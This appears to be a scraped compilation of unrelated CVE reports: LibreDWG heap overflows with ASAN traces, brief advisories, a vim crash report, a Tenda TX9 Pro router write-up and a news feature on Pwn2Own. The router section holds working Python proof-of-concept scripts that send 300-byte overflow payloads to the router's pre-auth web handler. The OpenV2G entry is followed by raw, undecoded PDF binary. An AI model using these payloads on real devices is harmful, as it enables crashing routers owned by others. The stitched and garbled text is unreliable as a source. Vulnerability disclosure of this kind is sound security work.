A heap buffer overflow was discovered in copy_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file.

**Affected version**

the latest commit and 0.12.4

**What's the problem?**

A heap buffer overflow was discovered in copy\_bytes in decode\_r2007.c:228.

ASAN report:

    ./dwgread ./tests_64199
    =================================================================
    ==9330==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005f55 at pc 0x000000ca93c3 bp 0x7ffe5a6134c0 sp 0x7ffe5a6134b8
    WRITE of size 1 at 0x62a000005f55 thread T0
        #0 0xca93c2 in copy_bytes /root/fuzz/libredwg/src/decode_r2007.c:228:12
        #1 0xca431a in decompress_r2007 /root/fuzz/libredwg/src/decode_r2007.c:550:11
        #2 0xcaa7fe in read_data_page /root/fuzz/libredwg/src/decode_r2007.c:728:13
        #3 0xcaa319 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:811:19
        #4 0xc8bee9 in read_2007_section_handles /root/fuzz/libredwg/src/decode_r2007.c:1622:11
        #5 0xc83c84 in read_r2007_meta_data /root/fuzz/libredwg/src/decode_r2007.c:2378:12
        #6 0x4f9fcc in decode_R2007 /root/fuzz/libredwg/src/decode.c:3836:11
        #7 0x4e49ab in dwg_decode /root/fuzz/libredwg/src/decode.c:248:29
        #8 0x4c75cc in dwg_read_file /root/fuzz/libredwg/src/dwg.c:254:11
        #9 0x4c5d47 in main /root/fuzz/libredwg/programs/dwgread.c
        #10 0x7f7541c7483f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #11 0x41ba58 in _start (/root/fuzz/pocs/dwgread+0x41ba58)
    
    0x62a000005f55 is located 0 bytes to the right of 23893-byte region [0x62a000000200,0x62a000005f55)
    allocated by thread T0 here:
        #0 0x495a22 in calloc (/root/fuzz/pocs/dwgread+0x495a22)
        #1 0xca9e98 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:774:26
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/libredwg/src/decode_r2007.c:228:12 in copy_bytes
    Shadow bytes around the buggy address:
      0x0c547fff8b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c547fff8be0: 00 00 00 00 00 00 00 00 00 00[05]fa fa fa fa fa
      0x0c547fff8bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==9330==ABORTING
    

**Compile command**

    CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make
    

**How can we reproduce the issue?**

    unzip tests_64199.zip
    dwgread ./tests_64199
    

POC file : tests\_64199.zip

CVE-2021-42586: Heap-buffer-overflow in copy_bytes in decode_r2007.c:228 · Issue #350 · LibreDWG/libredwg

A heap buffer overflow was discovered in copy_compressed_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file.

**Affected version**

the latest commit and 0.12.4

**What's the problem?**

A heap buffer overflow was discovered in copy\_compressed\_bytes in decode\_r2007.c:332.

ASAN report:

    ./dwgread ./tests_64205
    ERROR: Section[7]->pages[0] overflow
    Warning: Failed to find section_info[1]
    ERROR: Failed to read header section
    Warning: Failed to find section_info[3]
    ERROR: Failed to read class section
    Warning: Failed to find section_info[7]
    ERROR: Failed to read objects section
    Warning: Failed to find section_info[2]
    Warning: thumbnail.size mismatch: 185216 != 163880
    ERROR: Failed to find page 222
    =================================================================
    ==9485==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000002e3 at pc 0x000000ca5f2b bp 0x7ffdbc6926d0 sp 0x7ffdbc6926c8
    WRITE of size 8 at 0x6020000002e3 thread T0
        #0 0xca5f2a in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53:10
        #1 0xca5f2a in copy_compressed_bytes /root/fuzz/libredwg/src/decode_r2007.c:332:7
        #2 0xca4195 in decompress_r2007 /root/fuzz/libredwg/src/decode_r2007.c:523:7
        #3 0xcaa7fe in read_data_page /root/fuzz/libredwg/src/decode_r2007.c:728:13
        #4 0xcaa319 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:811:19
        #5 0xc9be6b in read_2007_section_revhistory /root/fuzz/libredwg/src/decode_r2007.c:1945:11
        #6 0xc83d65 in read_r2007_meta_data /root/fuzz/libredwg/src/decode_r2007.c:2387:12
        #7 0x4f9fcc in decode_R2007 /root/fuzz/libredwg/src/decode.c:3836:11
        #8 0x4e49ab in dwg_decode /root/fuzz/libredwg/src/decode.c:248:29
        #9 0x4c75cc in dwg_read_file /root/fuzz/libredwg/src/dwg.c:254:11
        #10 0x4c5d47 in main /root/fuzz/libredwg/programs/dwgread.c
        #11 0x7f581684583f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #12 0x41ba58 in _start (/root/fuzz/pocs/dwgread+0x41ba58)
    
    0x6020000002e3 is located 3 bytes to the right of 16-byte region [0x6020000002d0,0x6020000002e0)
    allocated by thread T0 here:
        #0 0x495a22 in calloc (/root/fuzz/pocs/dwgread+0x495a22)
        #1 0xca9e98 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:774:26
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/x86_64-linux-gnu/bits/string3.h:53:10 in memcpy
    Shadow bytes around the buggy address:
      0x0c047fff8000: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 fa
      0x0c047fff8010: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 06 fa
      0x0c047fff8020: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa
      0x0c047fff8030: fa fa 04 fa fa fa 00 06 fa fa 04 fa fa fa 04 fa
      0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 02 fa fa fa 02 fa
    =>0x0c047fff8050: fa fa 02 fa fa fa 02 fa fa fa 00 00[fa]fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==9485==ABORTING
    

**Compile command**

    CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make
    

**How can we reproduce the issue?**

    unzip tests_64205.zip
    dwgread ./tests_64205
    

POC file :  
tests\_64205.zip

CVE-2021-42585: Heap-buffer-overflow in copy_compressed_bytes in decode_r2007.c:332 · Issue #351 · LibreDWG/libredwg

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

CVE-2022-28104: Security Bulletins | Foxit Software

A vulnerability has been identified in OpenV2G (V0.9.4). The OpenV2G EXI parsing feature is missing a length check when parsing X509 serial numbers. Thus, an attacker could introduce a buffer overflow that leads to memory corruption.

%PDF-1.5 %���� 1 0 obj << /D \[2 0 R /XYZ 70.866 771.024 null\] >> endobj 3 0 obj << /D \[2 0 R /XYZ 70.866 646.963 null\] >> endobj 4 0 obj << /D \[2 0 R /XYZ 70.866 598.838 null\] >> endobj 5 0 obj << /D \[2 0 R /XYZ 70.866 479.608 null\] >> endobj 6 0 obj << /D \[2 0 R /XYZ 70.866 420.525 null\] >> endobj 7 0 obj << /D \[8 0 R /XYZ 85.039 479.479 null\] >> endobj 9 0 obj << /D \[8 0 R /XYZ 70.866 195.109 null\] >> endobj 10 0 obj << /S /GoTo /D \[2 0 R /Fit\] >> endobj 2 0 obj << /Contents 11 0 R /Type /Page /Resources 12 0 R /Parent 13 0 R /Annots \[14 0 R 15 0 R 16 0 R 17 0 R 18 0 R 19 0 R\] /MediaBox \[0 0 595.276 841.89\] >> endobj 14 0 obj << /A << /S /URI /Type /Action /URI (https://sourceforge.net/projects/openv2g/) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[303.117 497.876 484.993 510.783\] >> endobj 15 0 obj << /A << /S /GoTo /D (section\*.2) >> /Subtype /Link /C \[1 0 0\] /Type /Annot /H /I /Border \[0 0 0\] /Rect \[386.143 437.342 524.579 448.878\] >> endobj 16 0 obj << /A << /S /GoTo /D (section\*.4) >> /Subtype /Link /C \[1 0 0\] /Type /Annot /H /I /Border \[0 0 0\] /Rect \[147.498 419.529 309.548 430.946\] >> endobj 17 0 obj << /A << /S /URI /Type /Action /URI (https://www.siemens.com/cert/operational-guidelines-industrial-security) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[164.798 328.453 487.754 339.989\] >> endobj 18 0 obj << /A << /S /URI /Type /Action /URI (https://www.siemens.com/industrialsecurity) >> /C \[0 1 1\] /Subtype /Link /Type /Annot /H /I /Border \[0 0 0\] /Rect \[406.699 298.684 525.406 310.102\] >> endobj 12 0 obj << /ProcSet \[/PDF /Text\] /Font << /F51 20 0 R /F48 21 0 R >> >> endobj 11 0 obj << /Filter /FlateDecode /Length 2127 >> stream xڵYKs�6��W�TUopn��rv<�J�S��8-s�����ʿ�n�I�b8��\`����|� E�\*��Og?���? �$VL��@G�(�8&��\`����,ݤ�b4fڄ�t��Gc\*ì�� M�/Y��A�~��������r�(/��#�z>�}������gE} ��4Xlξ�Kx�K���~� ��D ��\`v����+U\]2Q=-��i��8����4���B뺁dL�2�@��Xsō��^!\*%�l�⒀�k�%��$B�(��OUD�4Mn� �����)�\`��4�Kݡ��:D�f��Se)������s����ML��'��9�bP���R��Ym�?�T���4O�gk�W��ZF�)Zp�� �2btܧ ��&5=����d~+�� ��Y�6a�>����bo�H�ǜ/ ��\* P�����u�HlZ��L��p�,dc�H��E@�RC��韓�tsn�Ԕ�%}���<���#�i^��0\[PC�J��=�fn�'�����'��.GZ�"����J@�Ъ��г|����ƥJ2�M����L�#����-���X�!�/���������؁O��n�/�h�{,\_G���܏T���ݶL2���)q�k���#N��nl�2^FL�ȷ(���W���n�pi�����))�U��\_b�����d��2Y��?�nl%HE \\�S��9�>3�V)�$�q������\[G��)��UX7�S�o�t�B�,�|�{���S��(��蛥��e%m���\*K/�Ҥ.�\]%j ��-�PTJtF�b���VCb�D�T�D�o��ǏW�ˎ��b�!+C>\`�+�sF(^Q�%���035��M1�n/�/� 0��T�E� � �o�W�n�\[��a{Ơ�9 8c��8��H�GaB�&�������헎��fJ9�s q��F��W����� "�AE�D��d������U��6js�~ח�qưh���< k~e�Zۢ-"(��m�g���"����6 -z����-Cd��#�b0%7��=Xl��'�G�C4-2>\_fIw�,!J5 ?����B������PxJկ�".b���l�}TQ݋l��ыl|�g���N ��,n{���F��g�C���w$V�I��\*oc��ߥX�����5mU�Oe�\\|8?w���V)n/�M���|�\_ؗŹ-�\`O����q�T���6yV(!R���

CVE-2022-27242

A buffer overflow in the razerkbd driver of OpenRazer v3.3.0 and below allows attackers to cause a Denial of Service (DoS) via a crafted buffer sent to the matrix_custom_frame device.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-29021: Fix oob memcpy matrix custom frame by tallossos · Pull Request #1790 · openrazer/openrazer

From a scrappy contest where hackers tried to win laptops, Pwn2Own has grown into a premier event that has helped normalize bug hunting.

In April 2007, when Apple's “I'm a Mac” ads were telling people that Macs can't get hacked, security researcher Dragos Ruiu decided to put the idea to the test – in front of a room full of security researchers, no less. He bought two MacBook Pros and put them on the floor of the CanSecWest conference in Vancouver, which he organized. The challenge had a catchy name, Pwn2Own: If you pwn a computer, you own it.

To Ruiu, it was more than a game. He wanted to make a “political point” that the commercials were misleading and Apple should take security seriously.

“Apple has had an on-again, off-again relationship with researchers. Sometimes they love hackers, sometimes they want to pretend hackers don't exist,” Ruiu tells Dark Reading. “This is one of those times when their marketing department used to run their security team.”

Back then, most companies also treated security researchers poorly. If someone found a flaw and reported it, they would often be threatened with lawyers. Part of Pwn2Own's merit is that it helped change that, “normalizing the concept of reporting bugs,” says Dustin Childs, communications manager for Trend Micro's Zero Day Initiative program, who now runs the event.

Throughout the years, the Pwn2Own competition has attracted high-profile researchers, including Dino Dai Zovi, Charlie Miller, George Hotz, Vincenzo Iozzo, Dion Blazakis, Ralf-Philipp Weinmann, and Jung Hoon Lee (aka Lokihardt). They’ve poked at everything, from Macs to phones, to IoT devices, industrial control systems, and even cars.

“It's a demonstration of some of the most advanced exploitation techniques that exist in the industry, at any given point in time,” says Brian Gorenc, senior director of vulnerability research at Trend Micro Gorenc. Demonstrations like these actually change how the industry looks at security.

Researchers’ efforts are well rewarded, too. Last year alone, cash prizes at Pwn2Own –

one of the highest-paying hacking competitions in the world – exceeded $2.5 million in total during multiple events.

This year’s contest, which starts today, marks its 15th anniversary and includes six categories: virtualization, Web browser, enterprise applications, server, local escalation of privilege, enterprise communications, and automotive. Whoever earns the most points will be crowned Master of Pwn, which will guarantee them “a killer trophy and a pretty snazzy jacket to boot.”

**Early Pwn2Own Wins  
**But let’s start with a recap of the first day of the 2007 CanSecWest conference, when two MacBook Pros with the latest security updates were in the spotlight, waiting to be hacked. A few researchers tried their luck, but the computers survived.

Then, security expert Shane Macaulay, who was in attendance, called former co-worker Dino Dai Zovi, based in New York, and asked him if he wanted to participate.

“I said, OK, cool, let me sit down and take a look and see what I can find,” Dai Zovi said in an interview a week after the conference. It took him five hours to detect a bug and another four to write the exploit. At 3 a.m., he called Macaulay, telling him they might actually win.

Dai Zovi found a bug in a QuickTime library loadable through a Java applet. An attacker could exploit it through any browser on Mac OS X that supports Java applets, such as Safari and Firefox. He sent his exploit to Macaulay, who put it on a website and emailed its URL to the organizers of the challenge. Once they loaded the malicious Web page, Macauley obtained a remote shell that granted him control of the laptop. The duo pwned the machine, earning them a 15-inch MacBook (which Macaulay kept since Dai Zovi had recently bought himself a laptop) and a $10,000 cash prize, courtesy of the Zero Day Initiative.

Dai Zovi says winning the first Pwn2Own event changed his life. “It was a massive benefit to my career and really put it on a different and better trajectory,” he says. “At the time, I had been writing exploits quietly as a personal hobby for almost a decade but was not at all known for it.”

The reputation he gained led him to consulting projects on iOS security and writing a book with another Pwn2Own rockstar, Charlie Miller, “The Mac Hacker's Handbook,” followed by “iOS Hacker's Handbook.”

Miller found himself in the spotlight the following year when he wrote an exploit for Safari with colleagues Jake Honoroff and Mark Daniel. “It might be because I'm biased about the things I'm good at, but \[Safari is\] the easiest browser \[to hack\],” Miller said in an interview after the competition.

**Beyond Apple  
**But Pwn2Own wasn’t only about Apple products. During the 2008 event, a Fujitsu U810 laptop running Vista was also attacked with an exploit for Adobe Flash written by Shane Macaulay, Alexander Sotirov, and Derek Callaway.

“In the very beginning, Pwn2Own was very much a browser-focused contest, and over the years, we've expanded the attack surfaces,” Gorenc says. “We've raised the prizes to make it more attractive for people to come in.”

Indeed, by 2015 the total cash prices exceeded $500,000. This month’s event, held in a hybrid format, has up to $600,000 waiting for the hacking of the Tesla Model 3, the largest target in Pwn2Own history.

But it is not only about money. “Pwn2Own was the first competition that focused on demonstrating real, working zero-day exploits against real-world software, whereas before most security competitions were capture-the-flag competitions that focused on “mock” targets and vulnerabilities,” Dai Zovi says. “It really put the focus on what was possible against the software that millions, if not billions, of people use to put a spotlight on how much we needed to improve security.”

**When ‘Wow’ Is an Understatement  
**The Pwn2Own competition has expanded to include software like MS Office, Adobe Reader, and Zoom. It has also tested the security of iPhones and BlackBerrys, and featured attacks targeting SCADA systems and IoT devices.

Some of the hacks were just mind-blowing and “times when 'wow' just isn't enough,” according to an HP Security Research blog post published during the 2015 event. That was when Jung Hoon Lee from South Korea hacked three browsers: Internet Explorer 11 (he found a time-of-check to time-of-use vulnerability), both the stable and beta version of Chrome (he exploited a buffer overflow race condition in the browser), and Safari (he exploited an uninitialized stack pointer in the browser).

  
Another exciting hack happened in 2017, when a team of researchers from Chinese Internet security company Qihoo 360 broke into VMWare's virtual machine sandbox.

“They fired up a virtual client, a fully patched Windows box. They pulled a fully patched browser and browsed to a Web page. They took their hands off the keyboard and let everything run,” Trend Micro's Childs says. “They combined enough bugs to break out of that \[sandbox\] and execute code on the underlying hypervisor on VMware Server underneath. And it was astonishing.”

  
Hacks like these made vendors feel edgy before the competition, and sometimes they would even push updates before an event.

“One year we got to Vancouver only to find out that the version of the BlackBerry deployed in Canada actually patched our bug, so we had to not sleep for two nights straight to fix the exploit,” says security expert Iozzo.

But, he adds, things like that were part of Pwn2Own's cachet. Many hackers who attended these events say they were both intense and fun. In March 2019, team Fluoroacetate, which took its name from a highly toxic substance that can kill bugs, found a severe memory randomization bug in Tesla's Model 3's infotainment system. Team members Richard Zhu and Amat Cama were crowned Masters of Pwn, earning $375,000 and the car.

  
Humor and jokes complement the stress associated with hacking.

“Last year also, we had someone hack a printer and play AC/DC through the speaker, which was pretty inventive,” Childs says. “We're dealing with a serious subject matter; the impact of these bugs can be tremendous. But at the same time, we try to keep the attitude light for the competitors so that we don't take ourselves too seriously.”

**Pwn2Own's Contributions to Bug Hunting  
**When the first edition of the Pwn2Own competition took place, the concept of hunting bugs was pretty exotic. Most companies were reluctant to talk to security researchers who reported issues, and even vendors who attended Pwn2Own events had mixed feelings about it.

But as the competition gained attention and brought everyone good publicity, companies started to open up. Looking back, security researcher Ruiu says that Pwn2Own partially assumed the role of negotiator, helping hackers get decent pay for their work.

“The manufacturers would love to just say: Have a T-shirt here,” Ruiu says. “But we became advocates for the security developers.”

As security experts and vendors met in the disclosure room to talk about hacks, the mood became less adversarial and more cooperative. The result: Bugs were fixed promptly before being exploited by a malicious entity.

Pwn2Own showed “it was OK for responsible organizations to compensate individual researchers for the hours of work put into their findings,” and led many large software companies to support bug-bounty programs, says Terri Forslof, a threat analyst at Microsoft.

Ruiu agrees, saying that Pwn2Own has helped pave the way for bug-bounty platforms like HackerOne and Bugcrowd, which work as intermediaries between researchers and tech companies. In 2021, HackerOne paid nearly $37 million for more than 66,500 valid bugs; the median earning for a critical bug was about $3,000. Also last year, Google offered bug hunters $8.7 million, while Zoom paid out $1.8 million.

Ruiu's initial goal of getting Apple to take security seriously has also been achieved, at least in part. The Cupertino, Calif., giant is currently offering up to $1 million to security experts for an exploit that results in a zero-click kernel code execution with persistence and kernel PAC bypass.

But although the role bug bounties play is undeniable, related issues remain. They still need to be formalized, says Childs, adding that such projects are not for everyone. “They're not a one-size-fits-all thing,” he says.

Many companies start bug-bounty programs without having a mature response process in place to be able to handle the reports they receive. As Childs puts it, “They get all these bugs, and they don't know what to do with them.” Organizations should have an efficient triage and specific procedures process in place to roll updates to customers, he points out.

“Until you have that basic, fundamental process available, offering a bug-bounty program is actually going to be more harmful than good because you're going to be getting bugs, and you're going to be overwhelmed by that,” Childs says. “And then you begin to have an adversarial relationship with the people who are reporting, even though you ask them to report.”

Hackers also complain. Some say they are underpaid for the bugs they discover, while others argue that their efforts are not always acknowledged in full.

During this week’s Pwn2Own, both Ruiu and ZDI hope to make one more small step in the right direction. “It still continues to change; it evolves continuously,” Ruiu says. “One of our goals is to improve the relationship between vendors and independent researchers.”

How Pwn2Own Made Bug Hunting a Real Sport

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

When providing certain input, the program will enter an infinite loop where it continually calls:

get\_expr\_register ->

cmdline\_handle\_backslash\_key ->

getcmdline ->

getcmdline\_int ->

cmdline\_handle\_backslash\_key ->

get\_expr\_register ->

etc.

**GDB**

    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    0x00005555556284c5 in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1618
    1618            save_cmdline(&save_ccline);
    

    #0  0x00005555556284c5 in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1618
    #1  0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574
    #2  0x000055555572ef97 in get_expr_register () at register.c:104
    #3  0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff7ff408) at ex_getln.c:850
    #4  0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925
    #5  0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574
    #6  0x000055555572ef97 in get_expr_register () at register.c:104
    #7  0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff7ff688) at ex_getln.c:850
    #8  0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925
    #9  0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574
    #10 0x000055555572ef97 in get_expr_register () at register.c:104
    

...

    #2052 0x000055555572ef97 in get_expr_register () at register.c:104                                                                  
    #2053 0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff84f138) at ex_getln.c:850                           
    #2054 0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925                        
    #2055 0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574                    
    #2056 0x000055555572ef97 in get_expr_register () at register.c:104                                                                  
    #2057 0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff84f3b8) at ex_getln.c:850                           
    #2058 0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925                        
    #2059 0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574                    
    #2060 0x000055555572ef97 in get_expr_register () at register.c:104                                                                  
    #2061 0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff84f638) at ex_getln.c:850                           
    #2062 0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925                        
    #2063 0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574                    
    #2064 0x000055555572ef97 in get_expr_register () at register.c:104                                                                  
    #2065 0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff84f8b8) at ex_getln.c:850                           
    #2066 0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925                        
    #2067 0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574                    
    #2068 0x000055555572ef97 in get_expr_register () at register.c:104                                                                  
    #2069 0x00005555556270cc in cmdline_handle_backslash_key (c=101, gotesc=0x7fffff84fb38) at ex_getln.c:850                           
    #2070 0x0000555555628c8f in getcmdline_int (firstc=61, count=0, indent=0, clear_ccline=1) at ex_getln.c:1925                        
    #2071 0x000055555562842d in getcmdline (firstc=61, count=0, indent=0, do_concat=GETLINE_NONE) at ex_getln.c:1574                    
    #2072 0x000055555572ef97 in get_expr_register () at register.c:104                                            
    

**Valgrind**

    ==99366== Memcheck, a memory error detector
    ==99366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==99366== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
    ==99366== Command: ./vim -u NONE -X -Z -e -s -S id:000000,sig:11,src:013242+022204,time:17320933,execs:2959795,op:splice,rep:2 -c :qa!
    ==99366== 
    ==99366== Stack overflow in thread #1: can't grow stack to 0x1ffe801000
    ==99366== 
    ==99366== Process terminating with default action of signal 11 (SIGSEGV)
    ==99366==    at 0x4E31A97: kill (syscall-template.S:78)
    ==99366==    by 0x28B7C9: may_core_dump (os_unix.c:3529)
    ==99366==    by 0x28B781: mch_exit (os_unix.c:3495)
    ==99366==    by 0x3FADEC: getout (main.c:1726)
    ==99366==    by 0x24F54D: preserve_exit (misc1.c:2217)
    ==99366==    by 0x289482: deathtrap (os_unix.c:1175)
    ==99366==    by 0x4E3183F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.28.so)
    ==99366==    by 0x483573D: malloc (vg_replace_malloc.c:299)
    

**Proof of Concept**

    ./vim -u NONE -e -s -S crash_input
    Segmentation fault
    

https://github.com/GreaterGoodest/vim-pocs/blob/master/crash\_input

**Impact**

This could cause a denial of service due to crashing the process.

CVE-2022-1771: Infinite recursive function calls result in stack overflow in vim

Tenda TX9 Pro V22.03.02.10 is vulnerable to Buffer Overflow via the functtion setIPv6Status() in httpd module.

**Multiple Pre-Auth Buffer Overflow in Tenda Router TX9 Pro**

*   Related products：TX9 Pro Update Date：2021/12/24
*   Hardware Version: V1.0
*   Software Version: V22.03.02.10
*   Download: TX9 Pro Firmware-Tenda-All For Better NetWorking (tendacn.com)

*   Author: anhnlq (aka h4niz) from VNG Cloud
*   Date: 19/04/2022

**Root cause**

I found a vulnerability in setIPv6Status() function, the root cause was lack of validate length of user input. The vulnerability code below:

    int __fastcall setIPv6Status(_DWORD *a1)
    {
    [Truncated]
      int v21[2]; // [sp+2Ch] [-1Ch] BYREF
      int v22[4]; // [sp+34h] [-14h] BYREF
    
    [Truncated]
      v3 = get_data_from_parameter((int)a1, (int)"conType", (int)"DHCP");
      sub_421BEC(v20, 0x19, v3);
      strcpy((int)v22, (int)v3);
      v4 = get_data_from_parameter((int)a1, (int)"ISPusername", (int)"");
      sub_421BEC(v20, 0x1F, v4);
      v5 = get_data_from_parameter((int)a1, (int)"ISPpassword", (int)"");
      sub_421BEC(v20, 0x20, v5);
      v6 = get_data_from_parameter((int)a1, (int)"prefixDelegate", (int)"0");
      sub_421BEC(v20, 0x1A, v6);
      strcpy((int)v21, (int)v6);
    [Truncated]
      return _stack_chk_guard;
    }
    

By using get_data_from_parameter(), the name of function is changed, to get input from user and pass to v3/v6 variables. I don't know why but most of get data method is have done by GetValue() function that validates length of input before assigns it to variable. After that, v3/v4 variable is copied to v22/v21 that is trigged buffer overflow by strcpy() function.

**POC1**

    #-*- encoding: utf8 -*-
    import requests
    
    # Product: Tenda Router
    # Related products：TX9 ProUpdate Date：2021/12/24
    # Hardware Version:V1.0
    # Software Version:V22.03.02.10
    
    
    url = "http://192.168.1.13/goform/setIPv6Status"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'conType': payload})
    

**POC2**

    #-*- encoding: utf8 -*-
    import requests
    
    # Product: Tenda Router
    # Related products：TX9 ProUpdate Date：2021/12/24
    # Hardware Version:V1.0
    # Software Version:V22.03.02.10
    
    
    url = "http://192.168.1.13/goform/setIPv6Status"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'prefixDelegate': payload})
    

**Router output log:**

     sudo qemu-mips -L firmadyne/images/1 firmadyne/images/1/usr/sbin/httpd 
    
    
    Yes:
    
          ****** WeLoveLinux****** 
    
     Welcome to ...
    main_test 481: g_lan_ip 0.0.0.0  admin
    [httpd][debug]----------------------------webs.c,158
    Unsupported setsockopt level=65535 optname=128
    httpd listen ip = 0.0.0.0 port = 80
    webs: Listening for HTTP requests at address 0.0.0.0
    Unsupported setsockopt level=65535 optname=128
    [192.168.1.13]..........
    web [192.168.1.13] login time expired.
    Unsupported setsockopt level=65535 optname=128
    [192.168.1.13]..........
    [ERROR][td_rpc_call         ][75   ]connect:Connection refused
    [ERROR][td_rpc_invok        ][100  ]Call RPC Failed
    [ERROR][td_rpc_call         ][75   ]connect:Connection refused
    [ERROR][td_rpc_invok        ][100  ]Call RPC Failed
    [ERROR][td_rpc_call         ][75   ]connect:Connection refused
    [ERROR][td_rpc_invok        ][100  ]Call RPC Failed
    qemu: uncaught target signal 11 (Segmentation fault) - core dumped
    Segmentation fault
    

**Mitigation:**

*   Validate data length before passing to strcpy()
